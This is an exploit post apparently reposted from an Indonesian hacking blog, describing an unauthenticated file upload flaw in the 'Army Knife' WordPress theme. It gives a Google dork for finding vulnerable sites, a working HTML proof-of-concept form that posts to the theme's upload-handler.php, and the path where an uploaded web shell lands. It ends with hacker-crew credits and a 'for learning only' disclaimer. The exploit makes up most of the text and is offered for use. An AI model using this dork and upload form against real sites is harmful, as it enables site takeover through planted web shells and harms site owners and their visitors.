WordPress Army Knife CSRF File Upload Vulnerability
Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co
Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on : Windows/Linux
Exploit POC :
<form enctype=”multipart/form-data”
action=”http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php” method=”post”>
Please choose a file: <input name=”uploadfile” type=”file” /><br />
<input type=”submit” value=”upload” />
</form>
File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php
./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo
JKT48 CYBER TEAM Black Devils Crew
Sumber http://noob1t4.blogspot.com/
Sekian Artikel WordPress Army Knife CSRF File Upload Vulnerability.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "WordPress Army Knife CSRF File Upload Vulnerability"
Posting Komentar